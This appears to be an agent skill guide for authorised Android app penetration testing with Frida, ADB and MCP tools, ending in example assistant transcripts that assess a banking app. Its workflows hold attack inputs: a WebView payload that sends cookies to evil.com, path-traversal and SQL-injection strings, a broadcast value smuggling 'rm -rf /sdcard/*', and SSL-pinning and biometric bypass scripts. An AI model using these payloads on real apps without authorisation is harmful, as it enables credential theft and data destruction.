android-pentest

# Android Mobile Application Penetration Testing

This skill enables comprehensive security testing of Android applications through ADB shell access to a rooted Android device and the Android Dynamic MCP server. It covers the full OWASP MASTG methodology, from reconnaissance through exploitation to reporting.
## When to Use This Skill

This skill should be invoked when:

- Starting a new Android application security assessment
- Performing dynamic analysis on Android apps
- Bypassing security controls (SSL pinning, root detection, anti-tampering)
- Extracting and analyzing application data
- Testing authentication and authorization mechanisms
- Analyzing network communications
- Fuzzing application components (activities, services, content providers, broadcast receivers)
- Performing OWASP MASTG compliance testing
- Writing penetration test reports
### Trigger Phrases

- "pentest this Android app"
- "security test the APK"
- "bypass SSL pinning on [app]"
- "extract data from [app]"
- "test Android authentication"
- "fuzz Android intents"
- "MASTG testing for [app]"
- "mobile app security assessment"
## Prerequisites

### Required Tools

| Tool | Purpose | Installation |
|---|---|---|
| ADB | Device communication | |
| Frida | Dynamic instrumentation | |
| Objection | Mobile exploration | |
| apktool | APK decompilation | |
| jadx | Java decompilation | Download from GitHub |
| Burp Suite | Traffic interception | Download from PortSwigger |
| Android Studio | Emulator/tools | Download from Google |
### MCP Server Setup

The Android Dynamic MCP server provides comprehensive tooling. Ensure it's configured:

```json
// ~/.claude/mcp.json
{
  "mcpServers": {
    "android-pentest": {
      "command": "python",
      "args": ["/path/to/android-dynamic/server.py"]
    }
  }
}
```

### Mobile MCP for Device Interaction
For advanced device, emulator, and simulator interactions, use Mobile MCP:

- Repository: https://github.com/mobile-next/mobile-mcp
- Purpose: Provides MCP-based interaction with Android emulators and physical devices
- Features: Screen capture, touch automation, app lifecycle management, and UI inspection

```json
// Add to ~/.claude/mcp.json
{
  "mcpServers": {
    "mobile-mcp": {
      "command": "npx",
      "args": ["-y", "@anthropic/mobile-mcp", "--android"]
    }
  }
}
```

This complements Frida/Objection for scenarios requiring direct device UI interaction.
## Device Setup

### Physical Device

1. Enable Developer Options (tap Build Number 7 times)
2. Enable USB Debugging
3. Root the device (Magisk recommended)

```bash
# Install Frida server
adb push frida-server /data/local/tmp/
adb shell chmod 755 /data/local/tmp/frida-server
adb shell "su -c '/data/local/tmp/frida-server -D &'"
```

### Emulator

- Use the Android Studio emulator with a Google APIs image (not a Play Store image)
- Root with rootAVD, or use a system image without Google Play
- Match the Frida server architecture (x86_64 for most emulators)

### Verification

```bash
# Verify ADB connection
adb devices

# Verify root access
adb shell su -c "id"

# Verify Frida connection
frida-ps -U
```

Test the MCP server in Claude Code: `get_app_info("com.android.settings")`

---

## Quick Start Guide
### 1. Initial Setup (2 minutes)

```text
User: I need to pentest the app com.example.targetapp
Claude: I'll set up the testing environment.

[MCP Tool Sequence]
1. get_app_info("com.example.targetapp")
   → Version, permissions, SDK levels, signatures
2. pull_apk("com.example.targetapp")
   → Extract APK for static analysis
3. list_exported_components("com.example.targetapp")
   → Map attack surface (activities, services, providers, receivers)
```

### 2. Bypass Security Controls (1 minute)

```text
[MCP Tool Sequence]
1. frida_spawn("com.example.targetapp")
   → PID: 12345
2. frida_bypass_ssl(12345)
   → SSL pinning disabled
3. frida_bypass_root(12345)
   → Root detection bypassed
4. setup_proxy("device-id", "192.168.1.100", 8080)
   → Traffic interception ready
```

### 3. Dynamic Analysis

```text
[MCP Tool Sequence]
1. frida_run_script(12345, "crypto_hooks.js")
2. frida_run_script(12345, "credential_hooks.js")
3. frida_run_script(12345, "intent_monitor.js")
4. get_logcat("com.example.targetapp")
```

### 4. Data Extraction

```text
[MCP Tool Sequence]
1. dump_databases("com.example.targetapp")
2. dump_shared_prefs("com.example.targetapp")
3. dump_internal_storage("com.example.targetapp")
4. dump_external_storage("com.example.targetapp")
```
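The third call in the initial setup maps the attack surface by reading which components are exported. As an added example (not part of the android-pentest skill or its MCP server), the following Python applies the platform's export rules to a manifest: an explicit `android:exported` wins; otherwise activities, services and receivers are exported exactly when they declare an intent filter, and providers default to exported only when the target SDK is below 17. The manifest, package name and component names are constructed for the demonstration; `exported_components` and `unguarded` are the example's own functions, not the server's `list_exported_components` tool.

```python
"""Map the exported component surface of an AndroidManifest.xml.

Added example, not part of the android-pentest skill or its MCP server: it
applies the platform's export rules using only the standard library. The
manifest below is constructed for the demonstration.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")

# Constructed sample manifest (targetSdk 30, so implicit export still applies).
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.targetapp">
  <uses-sdk android:minSdkVersion="26" android:targetSdkVersion="30"/>
  <application>
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".DeepLinkActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="targetapp"/>
      </intent-filter>
    </activity>
    <activity android:name=".SettingsActivity" android:exported="false"/>
    <service android:name=".SyncService" android:exported="true"/>
    <receiver android:name=".PushReceiver">
      <intent-filter>
        <action android:name="com.example.targetapp.PUSH"/>
      </intent-filter>
    </receiver>
    <provider android:name=".provider.DocumentProvider"
              android:authorities="com.example.targetapp.provider"
              android:exported="true"
              android:permission="com.example.targetapp.READ_DOCS"/>
    <provider android:name=".InternalProvider"
              android:authorities="com.example.targetapp.internal"/>
  </application>
</manifest>
"""


def _attr(elem, name):
    """Read an android:-namespaced attribute."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(elem, target_sdk):
    """Platform rule: an explicit android:exported wins. Otherwise activities,
    services and receivers are exported exactly when they declare an
    <intent-filter>; providers default to exported only below API 17."""
    explicit = _attr(elem, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if elem.tag == "provider":
        return target_sdk < 17
    return elem.find("intent-filter") is not None


def exported_components(manifest_xml):
    """Return the exported components with the facts a tester records:
    how they became exported, whether a permission guards them, and which
    URI schemes their intent filters accept."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    uses_sdk = root.find("uses-sdk")
    target_sdk = int(_attr(uses_sdk, "targetSdkVersion") or 1) if uses_sdk is not None else 1
    found = []
    for elem in root.find("application"):
        if elem.tag not in COMPONENT_TAGS or not is_exported(elem, target_sdk):
            continue
        name = _attr(elem, "name") or ""
        if name.startswith("."):
            name = package + name
        found.append({
            "type": elem.tag,
            "name": name,
            "explicit": _attr(elem, "exported") is not None,
            "permission": _attr(elem, "permission"),
            "schemes": sorted({_attr(d, "scheme") for d in elem.iter("data") if _attr(d, "scheme")}),
        })
    return found


def unguarded(components):
    """Exported components with no permission: the entry points to test first
    and, for the developer, the ones to set exported="false" or guard."""
    return [c["name"] for c in components if c["permission"] is None]


if __name__ == "__main__":
    comps = exported_components(SAMPLE_MANIFEST)
    for c in comps:
        how = "explicit" if c["explicit"] else "implicit (intent-filter)"
        print("%-9s %-48s %-24s perm=%s schemes=%s" % (c["type"], c["name"], how, c["permission"], c["schemes"]))
    print("unguarded:", unguarded(comps))
```

Running it prints one line per exported component. The implicit entries are the ones a reviewer asks the developer to declare explicitly (from target SDK 31 the attribute is mandatory for any component with an intent filter), and the unguarded list is the order in which to test.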
## Methodology Reference

| Document | Coverage |
|---|---|
| methodology/recon.md | Information gathering, attack surface mapping |
| methodology/static_analysis.md | APK analysis, code review, secrets detection |
| methodology/dynamic_analysis.md | Runtime testing, hooking, instrumentation |
| methodology/network_testing.md | Traffic analysis, API testing, TLS verification |
| methodology/data_storage.md | Local storage, databases, file permissions |
| methodology/crypto_testing.md | Encryption analysis, key management |
| methodology/auth_testing.md | Authentication, session management, biometrics |
| methodology/client_side_injection.md | WebViews, deep links, content providers |
## Common Workflows with MCP Tool Sequences

### Workflow 1: Complete Application Assessment

```python
# Phase 1: Reconnaissance
get_app_info("com.target.app")
pull_apk("com.target.app")
list_exported_components("com.target.app")

# Phase 2: Bypass Protections
pid = frida_spawn("com.target.app")
frida_bypass_ssl(pid)
frida_bypass_root(pid)
setup_proxy(device_id, "192.168.1.100", 8080)

# Phase 3: Dynamic Analysis
frida_run_script(pid, "crypto_hooks.js")
frida_run_script(pid, "credential_hooks.js")
frida_run_script(pid, "intent_monitor.js")

# Phase 4: Data Extraction
dump_databases("com.target.app")
dump_shared_prefs("com.target.app")
dump_internal_storage("com.target.app")

# Phase 5: Component Testing
launch_activity("com.target.app", ".DeepLinkActivity",
                extras={"url": "javascript:alert(1)"})
query_content_provider("content://com.target.app.provider/users")
fuzz_intent_extra("com.target.app", ".ProcessActivity",
                  "data", ["../../../etc/passwd", "' OR '1'='1"])

# Phase 6: Network Testing
capture_traffic_start("com.target.app")
# [interact with app]
capture_traffic_stop()
```
### Workflow 2: SSL Pinning Bypass

```python
# Method 1: Universal Frida bypass (most apps)
pid = frida_spawn("com.target.app")
frida_bypass_ssl(pid)

# Method 2: Custom script for a specific library
frida_run_script(pid, """
Java.perform(function() {
    var CustomPinner = Java.use('com.target.app.security.Pinner');
    CustomPinner.verify.implementation = function() {
        console.log('[+] Bypassed custom pinner');
        return true;
    };
});
""")

# Method 3: If the app uses flutter_ssl_pinning
frida_run_script(pid, """
var flutter = Process.findModuleByName("libflutter.so");
Interceptor.attach(Module.findExportByName("libssl.so", "SSL_CTX_set_custom_verify"), {
    onEnter: function(args) {
        args[2] = new NativeCallback(function() { return 0; }, 'int', ['pointer', 'pointer']);
    }
});
""")
```
### Workflow 3: Authentication Testing

```python
# Hook authentication methods
frida_hook_method(pid, "com.target.app.auth.AuthService", "login")
frida_hook_method(pid, "com.target.app.auth.TokenValidator", "validateToken")

# Biometric bypass
frida_run_script(pid, "biometric_bypass.js")

# Credential monitoring
frida_run_script(pid, "credential_hooks.js")

# Session manipulation
frida_hook_method(pid, "com.target.app.session.SessionManager", "*")
```
### Workflow 4: Deep Link / Intent Testing

```python
# Map attack surface
components = list_exported_components("com.target.app")

# Test deep links
launch_activity("com.target.app", ".DeepLinkActivity",
                data_uri="targetapp://transfer?amount=1000&to=attacker")

# XSS in WebView
launch_activity("com.target.app", ".WebViewActivity",
                extras={"url": "javascript:document.location='http://evil.com/?c='+document.cookie"})

# Path traversal in file handling
fuzz_intent_extra("com.target.app", ".FileActivity", "filepath", [
    "../../../data/data/com.other.app/databases/secrets.db",
    "file:///data/local/tmp/evil.html",
    "content://com.target.app.provider/../../../etc/passwd"
])

# Content provider SQL injection
query_content_provider("content://com.target.app.provider/users?id=1' OR '1'='1' --")

# Broadcast injection
send_broadcast("com.target.app.CUSTOM_ACTION",
               extras={"command": "; rm -rf /sdcard/*"})
```
### Workflow 5: Cryptography Analysis

```python
# Hook all crypto operations
frida_run_script(pid, "crypto_hooks.js")

# Detect weak algorithms
frida_run_script(pid, """
Java.perform(function() {
    var Cipher = Java.use('javax.crypto.Cipher');
    Cipher.getInstance.overload('java.lang.String').implementation = function(algo) {
        console.log('[CRYPTO] Algorithm: ' + algo);
        if (algo.indexOf('ECB') !== -1) console.log('[!] WEAK: ECB mode');
        if (algo.indexOf('DES') !== -1) console.log('[!] WEAK: DES');
        if (algo.indexOf('RC4') !== -1) console.log('[!] WEAK: RC4');
        return this.getInstance(algo);
    };
});
""")

# Search for hardcoded keys
frida_memory_search(pid, "-----BEGIN RSA PRIVATE KEY-----")
frida_memory_search(pid, "AES_SECRET_KEY")

# Dump encryption keys at runtime
frida_hook_method(pid, "javax.crypto.spec.SecretKeySpec", "$init")
```
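The weak-algorithm hook above only substring-matches `ECB`, `DES` and `RC4`, so it misses a bare `Cipher.getInstance("AES")` (which Android's providers resolve to ECB with PKCS5 padding) and flags `RSA/ECB/...`, where "ECB" is nominal and the padding is what matters. As an added example, not part of the skill's `crypto_hooks.js`, the following Python parses the `[CRYPTO] Algorithm:` lines the hook logs and classifies each transformation by algorithm, mode and padding. The log lines are constructed to match the hook's output format.

```python
"""Classify Cipher.getInstance() transformations from the weak-algorithm hook.

Added example, not part of the android-pentest skill: the hook only greps for
'ECB', 'DES' and 'RC4'; this splits each transformation into algorithm/mode/
padding and applies a fuller rule set. SAMPLE_LOG is constructed.
"""
import re

LOG_RE = re.compile(r"\[CRYPTO\] Algorithm: (?P<t>\S+)")

# Ciphers that should not appear in new code (reason shown in findings).
WEAK_CIPHERS = {
    "DES": "56-bit key",
    "DESEDE": "64-bit block (Sweet32), slow",
    "RC2": "legacy, 64-bit block",
    "RC4": "biased keystream",
    "ARCFOUR": "biased keystream (RC4 alias)",
}
# Block ciphers whose bare name makes the provider default to ECB/PKCS5Padding.
BLOCK_CIPHERS = {"AES", "DES", "DESEDE", "BLOWFISH", "RC2"}

# Constructed sample of hook output.
SAMPLE_LOG = """\
[CRYPTO] Algorithm: AES/ECB/PKCS5Padding
[CRYPTO] Algorithm: AES/GCM/NoPadding
[CRYPTO] Algorithm: DES/CBC/PKCS5Padding
[CRYPTO] Algorithm: RC4
[CRYPTO] Algorithm: AES
[CRYPTO] Algorithm: RSA/ECB/OAEPWithSHA-256AndMGF1Padding
[CRYPTO] Algorithm: RSA/ECB/PKCS1Padding
[CRYPTO] Algorithm: AES/CBC/PKCS5Padding
"""


def assess_transformation(transformation):
    """Return (severity, findings) for one JCE transformation string.
    WEAK: fix before release. REVIEW: acceptable only with a compensating
    control (e.g. a MAC over CBC ciphertext). OK: nothing to report."""
    parts = transformation.split("/")
    algo = parts[0].upper()
    mode = parts[1].upper() if len(parts) > 1 else None
    padding = parts[2].upper() if len(parts) > 2 else None
    weak, notes = [], []

    if algo in WEAK_CIPHERS:
        weak.append("%s: %s" % (parts[0], WEAK_CIPHERS[algo]))

    if algo == "RSA":
        # "ECB" in an RSA transformation is nominal; the padding is what matters.
        if padding == "PKCS1PADDING":
            notes.append("PKCS#1 v1.5 padding: prefer OAEP")
    elif mode is None:
        if algo in BLOCK_CIPHERS:
            weak.append("no mode given: provider defaults to ECB/PKCS5Padding")
    elif mode == "ECB":
        weak.append("ECB mode leaks plaintext patterns")
    elif mode in ("CBC", "CTR", "CFB", "OFB"):
        notes.append("%s is unauthenticated: use GCM or add a MAC" % mode)

    if weak:
        return "WEAK", weak + notes
    return ("REVIEW", notes) if notes else ("OK", [])


def scan_log(text):
    """Run the classifier over hook output; one row per logged transformation."""
    rows = []
    for m in LOG_RE.finditer(text):
        severity, findings = assess_transformation(m.group("t"))
        rows.append({"transformation": m.group("t"), "severity": severity, "findings": findings})
    return rows


if __name__ == "__main__":
    for row in scan_log(SAMPLE_LOG):
        print("%-7s %-45s %s" % (row["severity"], row["transformation"], "; ".join(row["findings"])))
```

Feed it the logcat or Frida console output after exercising the app's login, storage and sync paths; each WEAK row is a finding, and each REVIEW row is a question for the developers about what authenticates the ciphertext.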
### Workflow 6: Data Exfiltration Analysis

```python
# Full data dump
databases = dump_databases("com.target.app")
prefs = dump_shared_prefs("com.target.app")
internal = dump_internal_storage("com.target.app")
external = dump_external_storage("com.target.app")
logs = get_logcat("com.target.app")

# Analyze for sensitive data
# Look for: tokens, passwords, PII, financial data, session IDs

# Monitor data writes in real time
frida_run_script(pid, """
Java.perform(function() {
    var SharedPrefs = Java.use('android.app.SharedPreferencesImpl$EditorImpl');
    SharedPrefs.putString.implementation = function(key, value) {
        console.log('[PREFS] ' + key + ' = ' + value);
        return this.putString(key, value);
    };
});
""")
```
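The "analyze for sensitive data" step above is left to the tester. As an added example (not part of the skill), the following Python triages one of the XML files `dump_shared_prefs()` returns: it flags entries whose key name or value shape (a JWT, a long base64 or hex blob) indicates a credential stored in plaintext, which is the insecure-storage finding Example 2 further down reports. The preferences file is constructed and every name and value in it is made up.

```python
"""Triage a dumped SharedPreferences XML for secrets stored in plaintext.

Added example, not the android-pentest skill's own tooling: it runs over the
XML that dump_shared_prefs() returns and flags entries whose key name or
value shape indicates a credential. SAMPLE_PREFS is constructed.
"""
import re
import xml.etree.ElementTree as ET

SENSITIVE_KEY = re.compile(r"(token|passw|secret|api[_-]?key|private|session)", re.I)
JWT_RE = re.compile(r"^eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*$")
HEX_BLOB = re.compile(r"^[0-9a-fA-F]{32,}$")
BASE64_BLOB = re.compile(r"^[A-Za-z0-9+/]{24,}={0,2}$")

# Constructed sample (the JWT payload is just {"sub":"1234"}, the hex value is
# sha256("test"); nothing here comes from a real app).
SAMPLE_PREFS = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="auth_token">eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0In0.c2lnbmF0dXJl</string>
    <string name="refresh_token">dGhpcyBpcyBhIHJlZnJlc2ggdG9rZW4gdmFsdWU=</string>
    <string name="theme">dark</string>
    <boolean name="onboarding_done" value="true" />
    <string name="user_password">hunter2</string>
    <int name="launch_count" value="12" />
    <string name="api_key">9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08</string>
</map>
"""


def classify_value(value):
    """Shape-based reasons: JWTs and long hex/base64 blobs are token-like.
    Hex is tested before base64 because every hex string is also valid base64."""
    reasons = []
    if JWT_RE.match(value):
        reasons.append("jwt")
    elif HEX_BLOB.match(value):
        reasons.append("hex-blob")
    elif BASE64_BLOB.match(value):
        reasons.append("base64-blob")
    return reasons


def scan_shared_prefs(xml_text):
    """Return one finding per suspicious entry: key, reasons, and a confidence
    that is 'high' when the value itself looks like a secret and 'medium'
    when only the key name suggests one."""
    findings = []
    for elem in ET.fromstring(xml_text):
        key = elem.get("name", "")
        # <string> carries its value as text; other types use a value attribute.
        value = (elem.text or "").strip() if elem.tag == "string" else (elem.get("value") or "")
        reasons = classify_value(value)
        if SENSITIVE_KEY.search(key):
            reasons.append("sensitive-key-name")
        if not reasons:
            continue
        findings.append({
            "key": key,
            "confidence": "high" if reasons[0] != "sensitive-key-name" else "medium",
            "reasons": reasons,
            "preview": value[:12] + ("..." if len(value) > 12 else ""),
        })
    return findings


if __name__ == "__main__":
    for f in scan_shared_prefs(SAMPLE_PREFS):
        print("%-6s %-16s %-30s %s" % (f["confidence"], f["key"], ",".join(f["reasons"]), f["preview"]))
```

Run it over every file under the app's `shared_prefs/` directory in the dump. On the remediation side, such values belong either out of SharedPreferences entirely or encrypted under a key held in the Android Keystore (which is what Jetpack Security's EncryptedSharedPreferences does), so that a device dump yields ciphertext only.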
---

## MCP Tool Reference

### Device Interaction

| Tool | Description | Example |
|---|---|---|
| | Current screen/UI elements | Finding clickable elements |
| | Tap at coordinates | Automating login flow |
| | Type into focused field | Entering credentials |
| | Press key | BACK=4, HOME=3, ENTER=66 |
| | Swipe gesture | Scrolling, pattern unlock |
| | Long press | Context menus |

### Frida Instrumentation

| Tool | Description | Example |
|---|---|---|
| `frida_spawn` | Start with Frida | Initial attachment |
| `frida_attach` | Attach to running | Already running app |
| `frida_run_script` | Run Frida script | Custom hooks |
| `frida_bypass_ssl` | Bypass SSL pinning | Enable interception |
| `frida_bypass_root` | Bypass root detection | Evade security |
| `frida_hook_method` | Hook method | Trace calls |
| | Trace crypto | Key extraction |
| | Dump credentials | Credential theft |
| `frida_enumerate_classes` | List classes | Class discovery |
| `frida_memory_search` | Search memory | Find secrets |

### Network Tools

| Tool | Description | Example |
|---|---|---|
| `setup_proxy` | Configure proxy | Burp interception |
| | Remove proxy | Cleanup |
| | Install CA cert | Trust Burp CA |
| `capture_traffic_start` | Start capture | Record traffic |
| `capture_traffic_stop` | Stop capture | Save PCAP |

### Data Extraction

| Tool | Description | Example |
|---|---|---|
| `dump_databases` | Extract SQLite DBs | User data, creds |
| `dump_shared_prefs` | Get preferences | Tokens, settings |
| `dump_internal_storage` | Internal files | Config, certs |
| `dump_external_storage` | SD card files | Exports, cache |
| `get_logcat` | Filtered logs | Debug info leak |

### Component Testing

| Tool | Description | Example |
|---|---|---|
| `list_exported_components` | Map attack surface | Find entry points |
| `launch_activity` | Start activity | Deep link test |
| `send_broadcast` | Send broadcast | Broadcast injection |
| | Start service | Service abuse |
| `query_content_provider` | Query provider | Data leakage |
| `fuzz_intent_extra` | Fuzz intents | Find vulns |

### App Management

| Tool | Description | Example |
|---|---|---|
| | Install APK | Deploy test build |
| | Remove app | Cleanup |
| | Clear data | Fresh state |
| `get_app_info` | App metadata | Permissions, SDK |
| `list_installed_apps` | All packages | Discovery |
| `pull_apk` | Extract APK | Static analysis |
## Frida Script Library

Pre-built scripts in the `/scripts/` directory:

| Script | Purpose |
|---|---|
| `ssl_pinning_bypass.js` | Universal SSL/TLS pinning bypass |
| `root_bypass.js` | Root detection bypass |
| `crypto_hooks.js` | Cryptographic operation monitoring |
| `credential_hooks.js` | Credential capture |
| | Network traffic monitoring |
| `biometric_bypass.js` | Biometric authentication bypass |
| `anti_tampering_bypass.js` | Anti-tampering/debugger bypass |
| `intent_monitor.js` | Intent/IPC monitoring |
| | WebView security monitoring |
| | Dynamic code loading detection |
| `keystore_hooks.js` | Android Keystore monitoring |
| `method_tracer.js` | Generic method tracing |
## Troubleshooting Guide

### Frida Issues

**"Failed to spawn: unable to find application"**

```bash
# Solution: Verify the package name
list_installed_apps() | grep <partial_name>
adb shell pm list packages | grep <partial_name>
```

**"Failed to attach: process not found"**

```bash
# Solution: App not running, use spawn instead
pid = frida_spawn("com.target.app")  # Instead of frida_attach
```

**"Script terminated with error"**

```bash
# Solution: Class/method not found
frida_enumerate_classes(pid, "TargetClass")  # Find exact class
# Check for obfuscation - class names may be: a, b, c, etc.
```

**Frida server crashes**

```bash
# Solution: Version mismatch
frida --version  # Check client version
# Download the matching server from https://github.com/frida/frida/releases
```
### SSL Pinning Issues

**Universal bypass doesn't work**

Solution: the app has a custom pinning implementation.

- Decompile the APK with jadx
- Search for: "certificate", "pin", "ssl", "trust"
- Identify the custom class and method
- Write a targeted Frida hook

Check for: OkHttp CertificatePinner, custom TrustManager, native SSL verification, Network Security Config.

**App still fails after bypass**

Solution: multiple pinning layers.

- Check for native SSL verification (libssl.so)
- Use anti_tampering_bypass.js for Frida detection bypass
- Try objection: `android sslpinning disable`
- Consider frida-gadget for persistent injection
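The list above ends with Network Security Config, the file where platform-level pinning and cleartext policy live (referenced from the manifest via `android:networkSecurityConfig` and found under `res/xml/` after apktool decoding). As an added example that is not part of the skill, the following Python audits such a file for the facts a reviewer records: whether user-installed CAs are trusted, where cleartext is permitted, whether pin sets have expired or lack a backup pin, and whether a debug-overrides block is present. The config is constructed and the pin value is a placeholder; `audit_nsc` is the example's own function.

```python
"""Audit an Android network_security_config.xml.

Added example, not part of the android-pentest skill: it reports the trust
anchors, cleartext policy, pin-set state and debug overrides a reviewer
records. SAMPLE_NSC is constructed; the pin value is a placeholder.
"""
import xml.etree.ElementTree as ET
from datetime import date

# Constructed sample: one pinned API host, one legacy host allowing cleartext,
# user CAs trusted in base-config, and a debug-overrides block left in.
SAMPLE_NSC = """<?xml version="1.0" encoding="utf-8"?>
<network-security-config>
  <base-config cleartextTrafficPermitted="false">
    <trust-anchors>
      <certificates src="system"/>
      <certificates src="user"/>
    </trust-anchors>
  </base-config>
  <domain-config>
    <domain includeSubdomains="true">api.example.com</domain>
    <pin-set expiration="2023-01-01">
      <pin digest="SHA-256">PLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDER=</pin>
    </pin-set>
  </domain-config>
  <domain-config cleartextTrafficPermitted="true">
    <domain>legacy.example.com</domain>
  </domain-config>
  <debug-overrides>
    <trust-anchors>
      <certificates src="user"/>
    </trust-anchors>
  </debug-overrides>
</network-security-config>
"""


def _trusts_user_cas(config_elem):
    """True if any <certificates src="user"/> appears under this config block."""
    return any(c.get("src") == "user" for c in config_elem.iter("certificates"))


def _finding(fid, severity, message):
    return {"id": fid, "severity": severity, "message": message}


def audit_nsc(xml_text, today):
    """Return findings for the config. `today` is an ISO date string so the
    pin-set expiry check is deterministic. Only explicit cleartext settings are
    flagged; the platform default depends on the target SDK."""
    root = ET.fromstring(xml_text)
    today = date.fromisoformat(today)
    findings = []

    base = root.find("base-config")
    if base is not None and _trusts_user_cas(base):
        findings.append(_finding("user-ca-trusted", "high",
                                 "base-config trusts user-installed CAs; release builds should trust system CAs only"))
    if base is not None and base.get("cleartextTrafficPermitted") == "true":
        findings.append(_finding("cleartext-permitted", "high", "base-config permits cleartext traffic"))

    for dc in root.findall("domain-config"):
        domains = ", ".join(d.text.strip() for d in dc.findall("domain"))
        if dc.get("cleartextTrafficPermitted") == "true":
            findings.append(_finding("cleartext-permitted", "high", "cleartext permitted for %s" % domains))
        if _trusts_user_cas(dc):
            findings.append(_finding("user-ca-trusted", "high", "user-installed CAs trusted for %s" % domains))
        pin_set = dc.find("pin-set")
        if pin_set is None:
            findings.append(_finding("no-pins", "info", "no pin-set for %s" % domains))
            continue
        expiration = pin_set.get("expiration")
        if expiration and date.fromisoformat(expiration) < today:
            findings.append(_finding("pin-set-expired", "medium",
                                     "pin-set for %s expired %s; the platform stops enforcing expired pins" % (domains, expiration)))
        if len(pin_set.findall("pin")) < 2:
            findings.append(_finding("single-pin", "low", "no backup pin for %s; key rotation will break the app" % domains))

    if root.find("debug-overrides") is not None:
        findings.append(_finding("debug-overrides", "info",
                                 "debug-overrides present (active only when android:debuggable is true); confirm the release build is not debuggable"))
    return findings


if __name__ == "__main__":
    for f in audit_nsc(SAMPLE_NSC, date.today().isoformat()):
        print("%-6s %-19s %s" % (f["severity"], f["id"], f["message"]))
```

If this audit reports no pin-set for the API host and the universal bypass still fails, the pinning is implemented in application code or a native library, which is where the decompile-and-search steps above pick up.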
### Root Detection Issues

**App detects root and exits**

Solution: the app uses multiple detection vectors.

- Use the comprehensive root_bypass.js
- Enable Magisk Hide / Zygisk DenyList
- Check for native root checks (hook fopen, access)
- Consider frida-gadget embedded in the APK

**App detects Frida**

Solution: Frida detection is in place.

- Use anti_tampering_bypass.js first
- Rename the frida-server binary
- Use frida-gadget instead
- Hook pthread_create to hide Frida threads
### ADB Issues

**"device unauthorized"**

```bash
adb kill-server
adb start-server
# Accept the prompt on the device
```

**"Permission denied" for data**

```bash
adb root  # If using a userdebug build
adb shell su -c "cat /data/data/<pkg>/..."  # With root
```

### Data Extraction Issues
**Database is encrypted (SQLCipher)**

```python
# Hook to capture the password
frida_hook_method(pid, "net.sqlcipher.database.SQLiteDatabase", "openOrCreateDatabase")

# Or search memory for the key
frida_memory_search(pid, "x]@1#%hJ")  # Common patterns
```
---

## Checklists Reference

| Checklist | Purpose |
|---|---|
| checklists/owasp_mastg_full.md | Complete MASTG compliance |
| checklists/quick_wins.md | Fast vulnerability finding |
| checklists/pre_engagement.md | Setup verification |
| checklists/report_items.md | Report completeness |

## Templates Reference

| Template | Purpose |
|---|---|
| templates/finding_template.md | Individual finding docs |
| templates/executive_summary.md | Management summary |
| templates/technical_report.md | Full technical report |
| templates/remediation_guide.md | Developer fixes |
## Example Claude Code Interactions

### Example 1: Starting New Assessment

```text
User: I need to pentest com.megabank.mobile. It has SSL pinning and root
detection.

Claude: I'll set up the testing environment for com.megabank.mobile.

[Executes MCP tools]

1. Getting app information:
   > get_app_info("com.megabank.mobile")
   Version: 3.2.1, Target SDK: 33, Min SDK: 26
   Permissions: INTERNET, CAMERA, BIOMETRIC, READ_CONTACTS...

2. Extracting APK:
   > pull_apk("com.megabank.mobile")
   Saved to: /tmp/com.megabank.mobile.apk

3. Mapping attack surface:
   > list_exported_components("com.megabank.mobile")
   Exported Activities:
   - com.megabank.mobile.DeepLinkActivity (intent-filter: megabank://)
   - com.megabank.mobile.ShareReceiveActivity
   Content Providers:
   - com.megabank.mobile.provider.DocumentProvider (exported)
   Broadcast Receivers:
   - com.megabank.mobile.PushReceiver

4. Starting with Frida and bypassing protections:
   > frida_spawn("com.megabank.mobile")
   PID: 12345
   > frida_bypass_ssl(12345)
   [+] SSL pinning bypass active - hooked 8 methods
   > frida_bypass_root(12345)
   [+] Root detection bypass active

5. Configuring traffic interception:
   > setup_proxy("emulator-5554", "192.168.1.100", 8080)
   [+] Proxy configured

Environment ready. I've identified 3 potential entry points for testing:
1. Deep link handler (megabank://) - test for URL scheme hijacking
2. DocumentProvider - test for path traversal
3. PushReceiver - test for broadcast injection

Would you like me to proceed with dynamic analysis or test specific components?
```

### Example 2: Data Storage Investigation
```text
User: Check what sensitive data this app stores locally

Claude: I'll perform comprehensive data storage analysis.

[Executes MCP tools]

1. SharedPreferences analysis:
   > dump_shared_prefs("com.megabank.mobile")
   [!] FINDING in auth_prefs.xml:
   - auth_token: "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
   - refresh_token: "dGhpcyBpcyBhIHJlZnJlc2ggdG9rZW4..."
   - pin_hash: "5e884898da28047d9166..."
   Severity: HIGH - Authentication tokens stored in plaintext
   MASTG: MASTG-TEST-0001 (Insecure Data Storage)

2. Database analysis:
   > dump_databases("com.megabank.mobile")
   Found: app_data.db (356 KB)
   [!] FINDING:
   - Table 'accounts': account_number, balance, last_transaction
   - Table 'transactions': 847 records with transaction history
   - Table 'cached_credentials': username, password_hash
   Severity: HIGH - Financial data in unencrypted database
   MASTG: MASTG-TEST-0001

3. Internal storage:
   > dump_internal_storage("com.megabank.mobile")
   [!] FINDING: /files/user_profile.json
   Contains: full_name, email, phone, ssn_last_4
   Severity: MEDIUM - PII in plaintext file

4. External storage:
   > dump_external_storage("com.megabank.mobile")
   [!] FINDING: /Android/data/com.megabank.mobile/files/exports/
   - statements_2024.pdf (world-readable)
   Severity: MEDIUM - Sensitive docs on external storage
   MASTG: MASTG-TEST-0003

Summary:
| Finding | Severity | MASTG ID |
|---------|----------|----------|
